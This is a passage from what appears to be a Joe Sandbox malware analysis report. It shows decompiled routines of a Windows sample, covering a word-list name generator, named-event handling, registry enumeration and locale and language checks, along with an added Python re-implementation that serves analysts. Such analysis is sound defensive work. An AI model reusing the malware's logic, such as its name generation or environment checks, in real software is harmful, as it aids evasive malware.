                            								_push(8); // 0x006d4059 (ERROR_NOT_ENOUGH_MEMORY)
                            								goto L34;
                            							} // 0x006d4059
                            							_t90 = _a8; // 0x006d3fa7
                            							_a4 = _a4 & 0x00000000; // 0x006d3faa (names stored so far)
                            							_v8 = _v8 & 0x00000000; // 0x006d3fae (loop counter)
                            							_t124 = _t103 + _t90 * 4; // 0x006d3fb2 (write cursor just past the pointer slots)
                            							if(_t90 <= 0) { // 0x006d3fb7
                            								L31: // 0x006d404f
                            								 *0x6da318 = _t103; // 0x006d404f (the finished table is published through this global)
                            								goto L35;
                            							} // 0x006d4055
                            							do { // 0x006d3fc2
                            								_t110 = 0x3c6ef35f + _v20 * 0x19660d; // 0x006d3fcb (LCG step: x = 0x19660d * x + 0x3c6ef35f mod 2^32)
                            								_v20 = 0x3c6ef35f + _t110 * 0x19660d; // 0x006d3fdf (second LCG step)
                            								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4))); // 0x006d3fe6 lstrcpy: first word
                            								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4))); // 0x006d3ffb lstrcat: second word appended
                            								_v12 = _v12 & 0x00000000; // 0x006d4001
                            								if(_a4 <= 0) { // 0x006d4009
                            									goto L30;
                            								} else {
                            									goto L26;
                            								}
                            								while(1) { // 0x006d400b
                            									L26: // 0x006d400b
                            									_t99 = _v12; // 0x006d400b
                            									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed @ 0x006d4012 lstrcmp: compare with a name already stored
                            									if(_t99 == 0) { // 0x006d401a (read as the lstrcmp result: taken literally the index would be 0 on every first pass)
                            										break;
                            									}
                            									_v12 = _v12 + 1; // 0x006d401c
                            									if(_v12 < _a4) { // 0x006d4025
                            										continue;
                            									}
                            									goto L30;
                            								} // 0x006d4027
                            								_v8 = _v8 - 1; // 0x006d4029 (match: the counter is stepped back so the iteration repeats)
                            								L30: // 0x006d402c
                            								_t97 = _a4; // 0x006d402c
                            								_a4 = _a4 + 1; // 0x006d402f
                            								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124; // 0x006d4033
                            								__imp__(_t124); // 0x006d4036 lstrlen
                            								_v8 = _v8 + 1; // 0x006d403c
                            								_t124 = _t124 + _t97 + 1; // 0x006d403f (advance past the string; _t97 here stands for the lstrlen result)
                            							} while (_v8 < _a8); // 0x006d4046
                            							goto L31;
                            						} // 0x006d3fc2
                            						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107; // 0x006d3f3d (record the start of a new word)
                            						_t101 = _t83; // 0x006d3f45
                            						if(_t83 - 0x61 <= 0x19) { // 0x006d3f4b (first byte in 'a'..'z')
                            							_t101 = _t101 - 0x20; // 0x006d3f4d (upper-case it)
                            						} // 0x006d3f4d
                            						 *_t107 = _t101; // 0x006d3f50
                            						_t113 = _t113 + 1; // 0x006d3f52
                            						goto L10;
                            					} // 0x006d3f52
                            				} // 0x006d3f2c
                            				if(_t118 != 0) { // 0x006d3f72 (a final word without a trailing delimiter)
                            					if(_t118 > _v8) { // 0x006d3f77
                            						_v8 = _t118; // 0x006d3f79
                            					} // 0x006d3f79
                            					_a8 = _a8 + 1; // 0x006d3f7c
                            				} // 0x006d3f7c
                            				goto L21;
                            			}

                            APIs
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • lstrcpy.KERNEL32(69B25F45,00000020), ref: 006D3FE6
                            • lstrcat.KERNEL32(69B25F45,00000020), ref: 006D3FFB
                            • lstrcmp.KERNEL32(00000000,69B25F45), ref: 006D4012
                            • lstrlen.KERNEL32(69B25F45), ref: 006D4036
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                            • String ID:
                            • API String ID: 3214092121-3916222277
                            • Opcode ID: 03fa8a65408121f36c11572f22b335e5b4b4da6d93ec1f15d9bba5ebfd154946
                            • Instruction ID: daad343f161804fb1a7f05e67bfa96a729b2a2e65769644e2f99e04f304d6bc3
                            • Opcode Fuzzy Hash: 03fa8a65408121f36c11572f22b335e5b4b4da6d93ec1f15d9bba5ebfd154946
                            • Instruction Fuzzy Hash: 33516931E00218EBDF21DF99C884AEDBBB7EF55350F15805BE9199B311CB70AA42CB91
                            Uniqueness

                            Uniqueness Score: -1.00%
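
The routine listed above as E006D3EE9 reads a CR/LF-delimited word list, upper-cases the first byte of each word, rejects lists of 32 words or fewer, and then fills a table with names made by joining two words picked with a 32-bit linear congruential generator (multiplier 0x19660d, increment 0x3c6ef35f, the constants of a widely used 32-bit LCG). The Python below is an added re-implementation written for this page so that an analyst can regenerate that table from a recovered word list and seed; it is not code from the sample or from Joe Sandbox. Two readings of the 22%-quality listing are assumptions and are marked as such in the code: the LCG outputs are taken as unsigned for the modulo, and a lstrcmp match is treated as "discard and try again". The word list is constructed for the example.

```python
# Added example: Python re-implementation of the name generator decompiled as
# E006D3EE9. Not code from the sample or from Joe Sandbox; readings of the
# ambiguous parts of the listing are marked ASSUMPTION below.
from __future__ import annotations

MASK32 = 0xFFFFFFFF
LCG_A = 0x19660D      # multiplier used at 0x006d3fcb / 0x006d3fdf (1664525)
LCG_C = 0x3C6EF35F    # increment used at the same sites (1013904223)
MIN_WORDS = 0x20      # the listing rejects a table of 0x20 words or fewer
ERROR_BAD_FORMAT = 0xB
CR, LF = 0x0D, 0x0A


def lcg_step(state: int) -> int:
    """One 32-bit LCG step: state * 0x19660d + 0x3c6ef35f (mod 2**32)."""
    return (state * LCG_A + LCG_C) & MASK32


def split_words(blob: bytes) -> list[bytes]:
    """Mirror the scan loop at 0x006d3f24..0x006d3f7c.

    CR and LF delimit words, a NUL ends the scan, and the first byte of each
    word is upper-cased when it is a-z (the _t83 - 0x61 <= 0x19 test). The
    pointer table holds (len >> 2) + 1 entries; once it is full the scan stops.
    """
    capacity = (len(blob) >> 2) + 1
    words: list[bytes] = []
    cur = bytearray()
    for b in blob:
        if b == 0:
            break
        if b in (CR, LF):
            if cur:
                words.append(bytes(cur))
                cur = bytearray()
            continue
        if not cur:                      # first byte of a new word
            if len(words) == capacity:   # _t113 == _t122: table full, jump to L21
                return words
            if 0x61 <= b <= 0x7A:
                b -= 0x20
        cur.append(b)
    if cur:                              # final word without a trailing delimiter
        words.append(bytes(cur))
    return words


def generate_names(seed: int, words: list[bytes], n: int) -> tuple[list[bytes], int]:
    """Mirror the do/while at 0x006d3fc2..0x006d4046.

    Each iteration advances the LCG twice and joins the two words selected by
    the two outputs (lstrcpy, then lstrcat). Every candidate is compared with
    the names already stored (lstrcmp at 0x006d4012).
    ASSUMPTION: the listing steps the loop counter back on a match, read here
    as "discard the duplicate and try again"; the LCG outputs are treated as
    unsigned for the modulo so the index always stays inside the word table.
    """
    count = len(words)
    state = seed & MASK32
    names: list[bytes] = []
    while len(names) < n:
        first = lcg_step(state)
        state = lcg_step(first)
        candidate = words[first % count] + words[state % count]
        if candidate in names:
            continue
        names.append(candidate)
    return names, state


def build_name_table(seed: int, blob: bytes) -> tuple[list[bytes], int]:
    """Equivalent of E006D3EE9(seed, buf, len): parse the list, enforce the
    minimum word count, then produce one name per word in the list."""
    words = split_words(bytes(blob))
    if len(words) <= MIN_WORDS:
        raise ValueError(
            f"{len(words)} words, need more than {MIN_WORDS} (error {ERROR_BAD_FORMAT:#x})")
    return generate_names(seed, words, len(words))


# Constructed sample input (not from the sample): 36 lower-case words with mixed
# CRLF / LF delimiters and one blank line, which the scanner must skip.
WORDLIST = (b"alpha\r\nbravo\r\ncharlie\ndelta\r\n\r\necho\r\nfoxtrot\r\ngolf\r\nhotel\r\n"
            b"india\r\njuliet\r\nkilo\r\nlima\r\nmike\r\nnovember\r\noscar\r\npapa\r\n"
            b"quebec\r\nromeo\r\nsierra\r\ntango\r\nuniform\r\nvictor\r\nwhiskey\r\nxray\r\n"
            b"yankee\r\nzulu\r\namber\r\nbasil\r\ncedar\r\ndune\r\nember\r\nfern\r\n"
            b"grove\r\nharbor\r\nivory\r\njade\r\n")

if __name__ == "__main__":
    table, final_state = build_name_table(0x1234, WORDLIST)
    for name in table[:5]:
        print(name.decode())
    print(f"LCG state after generation: {final_state:#010x}")
```

The listing writes a NUL only where it finds a CR or LF, so a final word cut off by the length argument keeps whatever byte follows it in memory; working on Python bytes objects sidesteps that detail, which is why the re-implementation never needs a terminator. Feed it the seed value passed in eax and the list as read from the sample, and the output order is the table the malware stores through *0x6da318.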

                            C-Code - Quality: 100%
                            			// Trailing "0x006d...." comments are the listing's per-statement address column.
                            			E006D797A(signed int _a4, signed int* _a8) {
                            				void* __ecx;
                            				void* __edi;
                            				signed int _t6;
                            				intOrPtr _t8;
                            				intOrPtr _t12;
                            				void* _t18;
                            				WCHAR* _t19;
                            				long _t20;
                            				void* _t25;
                            				signed int* _t28;
                            				CHAR* _t30;
                            				long _t31;
                            				WCHAR** _t32;
                            
                            				_t6 =  *0x6da310; // 0xd448b889 @ 0x006d797b
                            				_t32 = _a4; // 0x006d7982
                            				_a4 = _t6 ^ 0x109a6410; // 0x006d798c
                            				_t8 =  *0x6da348; // 0xdcd5a8 @ 0x006d7990
                            				_t3 = _t8 + 0x6db87a; // 0x61636f4c @ 0x006d7996 (the dword shown is the ASCII bytes "Loca": the event name built below begins with Loca)
                            				_t25 = 0; // 0x006d79a5 (event handle)
                            				_t30 = E006D6702(_t3, 1); // 0x006d79ac (builds the name string; lstrlen/lstrcpy/lstrcat in the subcall list)
                            				if(_t30 != 0) { // 0x006d79b0
                            					_t25 = CreateEventA(0x6da34c, 1, 0, _t30); // 0x006d79c2 (named, manual-reset, initially non-signalled)
                            					E006D789E(_t30); // 0x006d79c4 (RtlFreeHeap)
                            				} // 0x006d79c4
                            				_t12 =  *0x6da2fc; // 0x2000000a @ 0x006d79c9
                            				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) { // 0x006d79d0
                            					L12: // 0x006d7a27
                            					_t28 = _a8; // 0x006d7a27
                            					if(_t28 != 0) { // 0x006d7a2d
                            						 *_t28 =  *_t28 | 0x00000001; // 0x006d7a2f (flag bit 0 set for the caller)
                            					} // 0x006d7a2f
                            					_t31 = E006D3BF0(_t32, 0); // 0x006d7a39
                            					if(_t31 == 0 && _t25 != 0) { // 0x006d7a3d
                            						_t31 = WaitForSingleObject(_t25, 0x4e20); // 0x006d7a4f (0x4e20 = 20000 ms)
                            					} // 0x006d7a4f
                            					if(_t28 != 0 && _t31 != 0) { // 0x006d7a53
                            						 *_t28 =  *_t28 & 0xfffffffe; // 0x006d7a59 (flag bit 0 cleared again on failure)
                            					} // 0x006d7a59
                            					goto L20;
                            				} else { // 0x006d79e0
                            					_t18 = E006D7256(); // executed @ 0x006d79e0
                            					if(_t18 != 0) { // 0x006d79e7
                            						goto L12;
                            					}
                            					_t19 = StrChrW( *_t32, 0x20); // 0x006d79ee (first space in the wide string)
                            					if(_t19 != 0) { // 0x006d79f6
                            						 *_t19 = 0; // 0x006d79fa (split: *_t32 keeps the part before the space)
                            						_t19 =  &(_t19[1]); // 0x006d79fe (_t19 now points at the remainder)
                            					} // 0x006d79fe
                            					_t20 = E006D5854(0,  *_t32, _t19, 0); // executed @ 0x006d7a06
                            					_t31 = _t20; // 0x006d7a0b
                            					if(_t31 == 0) { // 0x006d7a0f
                            						if(_t25 == 0) { // 0x006d7a13
                            							L22: // 0x006d7a68
                            							return _t31; // 0x006d7a6e
                            						} // 0x006d7a6e
                            						_t31 = WaitForSingleObject(_t25, 0x4e20); // 0x006d7a21 (20000 ms)
                            						if(_t31 == 0) { // 0x006d7a25 (WAIT_OBJECT_0: the event was signalled)
                            							L20: // 0x006d7a5c
                            							if(_t25 != 0) { // 0x006d7a5e
                            								CloseHandle(_t25); // 0x006d7a61
                            							} // 0x006d7a61
                            							goto L22;
                            						} // 0x006d7a5e
                            					} // 0x006d7a25
                            					goto L12;
                            				} // 0x006d7a0f
                            			}

                            APIs
                              • Part of subcall function 006D6702: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,014A9DE0,00000000,?,?,69B25F44,00000005,006DA00C,4D283A53,?,?), ref: 006D6738
                              • Part of subcall function 006D6702: lstrcpy.KERNEL32(00000000,00000000), ref: 006D675C
                              • Part of subcall function 006D6702: lstrcat.KERNEL32(00000000,00000000), ref: 006D6764
                            • CreateEventA.KERNEL32(006DA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,006D68D0,?,?,?), ref: 006D79BB
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            • StrChrW.SHLWAPI(006D68D0,00000020,61636F4C,00000001,00000000,?,?,00000000,?,006D68D0,?,?,?), ref: 006D79EE
                            • WaitForSingleObject.KERNEL32(00000000,00004E20,006D68D0,00000000,00000000,?,00000000,?,006D68D0,?,?,?), ref: 006D7A1B
                            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,006D68D0,?,?,?), ref: 006D7A49
                            • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,006D68D0,?,?,?), ref: 006D7A61
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                            • String ID:
                            • API String ID: 73268831-0
                            • Opcode ID: 5709108c9049c584825379866334b43862cd895a010b41b985415d0a5810c233
                            • Instruction ID: a747ebad95e4ee3c418a6130b2721000e450e3a03a4b51a41977cd839aaa02e5
                            • Opcode Fuzzy Hash: 5709108c9049c584825379866334b43862cd895a010b41b985415d0a5810c233
                            • Instruction Fuzzy Hash: 79212632D193119BC7315BA9AC44ABF73ABAB88710F0A112BF951DB344EB71CE008696
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			// Trailing "0x0040...." comments are the listing's per-statement address column.
                            			_entry_() {
                            				void* _t1;
                            				int _t4;
                            				int _t6;
                            
                            				_t6 = 0; // 0x00401830 (process exit code)
                            				_t1 = HeapCreate(0, 0x400000, 0); // executed @ 0x00401839 (private heap, 4 MiB initial size, growable)
                            				 *0x403160 = _t1; // 0x0040183f
                            				if(_t1 != 0) { // 0x00401846
                            					 *0x403170 = GetModuleHandleA(0); // 0x0040184f (own image base)
                            					GetCommandLineW(); // executed @ 0x00401854 (result unused in the listing)
                            					_t4 = E00401493(); // executed @ 0x0040185a (see the 00401493 subcall APIs below)
                            					_t6 = _t4; // 0x00401865
                            					HeapDestroy( *0x403160); // 0x00401867
                            				} // 0x00401867
                            				ExitProcess(_t6); // 0x0040186e
                            			}

                            APIs
                            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401839
                            • GetModuleHandleA.KERNEL32(00000000), ref: 00401849
                            • GetCommandLineW.KERNEL32 ref: 00401854
                              • Part of subcall function 00401493: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004014C8
                              • Part of subcall function 00401493: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 0040150F
                              • Part of subcall function 00401493: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401537
                              • Part of subcall function 00401493: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401541
                              • Part of subcall function 00401493: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401554
                              • Part of subcall function 00401493: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401581
                              • Part of subcall function 00401493: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 0040159F
                            • HeapDestroy.KERNEL32 ref: 00401867
                            • ExitProcess.KERNEL32 ref: 0040186E
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
                            • String ID:
                            • API String ID: 1863574965-0
                            • Opcode ID: 97b04516d4304a837a7655c5891b85a5ac373015af52e8364f4eed2c235b444e
                            • Instruction ID: c66274986b3ea6f1620f212ac01f8038ee2d29bdd939a4d2e60d119bbebbbe51
                            • Opcode Fuzzy Hash: 97b04516d4304a837a7655c5891b85a5ac373015af52e8364f4eed2c235b444e
                            • Instruction Fuzzy Hash: B7E0B671402720ABC3112FB1AF0CA4F3E28BB0A7527048536F605F22B1CB780A01CA9C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SysAllocString.OLEAUT32(80000002), ref: 006D26E6
                            • SysAllocString.OLEAUT32(006D23DF), ref: 006D272A
                            • SysFreeString.OLEAUT32(00000000), ref: 006D273E
                            • SysFreeString.OLEAUT32(00000000), ref: 006D274C
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: String$AllocFree
                            • String ID:
                            • API String ID: 344208780-0
                            • Opcode ID: 77f32665d1788e367285b16446541713a6122041ffb6acc120745a44664efca5
                            • Instruction ID: 82c95505401e06be6df1e8d5b6892e444edd9a6b541245e3a1d6ce06555dba39
                            • Opcode Fuzzy Hash: 77f32665d1788e367285b16446541713a6122041ffb6acc120745a44664efca5
                            • Instruction Fuzzy Hash: B131F77690020AEFCB15CF98D8D48AE7BBABF58340B21842FE506DB350D7719981CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D155C(void* __ecx, intOrPtr _a4) {
                            				int* _v8;
                            				int _v12;
                            				int* _v16;
                            				int _v20;
                            				int* _v24;
                            				char* _v28;
                            				void* _v32;
                            				long _t33;
                            				char* _t35;
                            				long _t39;
                            				long _t42;
                            				intOrPtr _t47;
                            				void* _t51;
                            				long _t53;
                            
                            				_t51 = __ecx;
                            				_v8 = 0;
                            				_v16 = 0;
                            				_v12 = 0;
                            				_v24 = 0;
                            				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                            				_t53 = _t33;
                            				if(_t53 != 0) {
                            					L18:
                            					return _t53;
                            				}
                            				_t53 = 8;
                            				_t35 = E006D7A71(0x104);
                            				_v28 = _t35;
                            				if(_t35 == 0) {
                            					L17:
                            					RegCloseKey(_v32); // executed
                            					goto L18;
                            				}
                            				_v20 = 0x104;
                            				do {
                            					_v16 = _v20;
                            					_v12 = 0x104;
                            					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                            					_t53 = _t39;
                            					if(_t53 != 0xea) {
                            						if(_t53 != 0) {
                            							L14:
                            							if(_t53 == 0x103) {
                            								_t53 = 0;
                            							}
                            							L16:
                            							E006D789E(_v28);
                            							goto L17;
                            						}
                            						_t42 = E006D2331(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                            						_t53 = _t42;
                            						if(_t53 != 0) {
                            							goto L14;
                            						}
                            						goto L12;
                            					}
                            					if(_v12 <= 0x104) {
                            						if(_v16 <= _v20) {
                            							goto L16;
                            						}
                            						E006D789E(_v24);
                            						_v20 = _v16;
                            						_t47 = E006D7A71(_v16);
                            						_v24 = _t47;
                            						if(_t47 != 0) {
                            							L6:
                            							_t53 = 0;
                            							goto L12;
                            						}
                            						_t53 = 8;
                            						goto L16;
                            					}
                            					_v8 = _v8 + 1;
                            					goto L6;
                            					L12:
                            				} while (WaitForSingleObject( *0x6da30c, 0) == 0x102);
                            				goto L16;
                            			}

                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,006D68B1,?), ref: 006D1582
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • RegEnumKeyExA.KERNELBASE(?,?,?,006D68B1,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,006D68B1), ref: 006D15C9
                            • WaitForSingleObject.KERNEL32(00000000,?,?,?,006D68B1,?,006D68B1,?,?,?,?,?,006D68B1,?), ref: 006D1636
                            • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,006D68B1,?), ref: 006D165E
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                            • String ID:
                            • API String ID: 3664505660-0
                            • Opcode ID: 70b6b8c5a11a8f2f8e6f462c2fa2ac8fbeab88ecdaaa967253c040918527609d
                            • Instruction ID: 56229c24c170fdcf9c19c4f6a289417047e13a5269d1dad3dd0a76e94ddb03e3
                            • Opcode Fuzzy Hash: 70b6b8c5a11a8f2f8e6f462c2fa2ac8fbeab88ecdaaa967253c040918527609d
                            • Instruction Fuzzy Hash: A9317C76C00119BBCF21AFA5DC849EEFBBAEB89700F20402BE511B6321D2B44E40DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 41%
                            			E006D6821(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                            				intOrPtr _v12;
                            				void* _v16;
                            				void* _v28;
                            				char _v32;
                            				void* __esi;
                            				void* _t20;
                            				void* _t26;
                            				void* _t29;
                            				void* _t38;
                            				signed int* _t39;
                            				void* _t40;
                            
                            				_t36 = __ecx;
                            				_v32 = 0;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_v12 = _a4;
                            				_t20 = E006D6413(__ecx,  &_v32); // executed
                            				_t38 = _t20;
                            				if(_t38 != 0) {
                            					L12:
                            					_t39 = _a8;
                            					L13:
                            					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                            						_t23 =  &(_t39[1]);
                            						if(_t39[1] != 0) {
                            							E006D14E2(_t23);
                            						}
                            					}
                            					return _t38;
                            				}
                            				_t26 = E006D1CE6(0x40,  &_v16); // executed
                            				if(_t26 != 0) {
                            					_v16 = 0;
                            				}
                            				_t40 = CreateEventA(0x6da34c, 1, 0,  *0x6da3e4);
                            				if(_t40 != 0) {
                            					SetEvent(_t40);
                            					Sleep(0xbb8); // executed
                            					CloseHandle(_t40);
                            				}
                            				_push( &_v32);
                            				if(_a12 == 0) {
                            					_t29 = E006D155C(_t36); // executed
                            				} else {
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_t29 = E006D2331(_t36);
                            				}
                            				_t41 = _v16;
                            				_t38 = _t29;
                            				if(_v16 != 0) {
                            					E006D1544(_t41);
                            				}
                            				if(_t38 != 0) {
                            					goto L12;
                            				} else {
                            					_t39 = _a8;
                            					_t38 = E006D797A( &_v32, _t39);
                            					goto L13;
                            				}
                            			}

                            APIs
                            • CreateEventA.KERNEL32(006DA34C,00000001,00000000,00000040,?,?,74D0F710,00000000,74D0F730), ref: 006D6872
                            • SetEvent.KERNEL32(00000000), ref: 006D687F
                            • Sleep.KERNELBASE(00000BB8), ref: 006D688A
                            • CloseHandle.KERNEL32(00000000), ref: 006D6891
                              • Part of subcall function 006D155C: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,006D68B1,?), ref: 006D1582
                              • Part of subcall function 006D155C: RegEnumKeyExA.KERNELBASE(?,?,?,006D68B1,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,006D68B1), ref: 006D15C9
                              • Part of subcall function 006D155C: WaitForSingleObject.KERNEL32(00000000,?,?,?,006D68B1,?,006D68B1,?,?,?,?,?,006D68B1,?), ref: 006D1636
                              • Part of subcall function 006D155C: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,006D68B1,?), ref: 006D165E
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                            • String ID:
                            • API String ID: 891522397-0
                            • Opcode ID: 5c534c6586518881ee7c19aa6f090aa9903e98a4dee2aa022b0e22bb357990be
                            • Instruction ID: f3c71342e47ca7615e97d59827c87cd88e4b40a8b68e5efb8c28ee91c2064aa1
                            • Opcode Fuzzy Hash: 5c534c6586518881ee7c19aa6f090aa9903e98a4dee2aa022b0e22bb357990be
                            • Instruction Fuzzy Hash: 5C219272D00229AFCB20AFE4D8858EE77ABAB48310B01442BFA11E7300D7759E459BB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D78B3(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                            				long _t26;
                            				intOrPtr* _t38;
                            				char* _t42;
                            				long _t43;
                            
                            				if(_a4 == 0) {
                            					L2:
                            					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                            					_t43 = _t26;
                            					if(_t43 == 0) {
                            						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                            						if(_a4 == 0) {
                            							_t43 = 0xe8;
                            						} else {
                            							_t42 = E006D7A71(_a4);
                            							if(_t42 == 0) {
                            								_t43 = 8;
                            							} else {
                            								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                            								if(_t43 != 0) {
                            									E006D789E(_t42);
                            								} else {
                            									 *_a20 = _t42;
                            									_t38 = _a24;
                            									if(_t38 != 0) {
                            										 *_t38 = _a4;
                            									}
                            								}
                            							}
                            						}
                            						RegCloseKey(_a12); // executed
                            					}
                            					L12:
                            					return _t43;
                            				}
                            				_t43 = E006D2B8C(_a4, _a8, _a12, _a16, _a20, _a24);
                            				if(_t43 == 0) {
                            					goto L12;
                            				}
                            				goto L2;
                            			}

                            APIs
                            • RegOpenKeyW.ADVAPI32(80000002,014A9F02,014A9F02), ref: 006D78EC
                            • RegQueryValueExW.KERNELBASE(014A9F02,?,00000000,80000002,00000000,00000000,?,006D2410,3D006D90,80000002,006D68B1,00000000,006D68B1,?,014A9F02,80000002), ref: 006D790E
                            • RegQueryValueExW.ADVAPI32(014A9F02,?,00000000,80000002,00000000,00000000,00000000,?,006D2410,3D006D90,80000002,006D68B1,00000000,006D68B1,?,014A9F02), ref: 006D7933
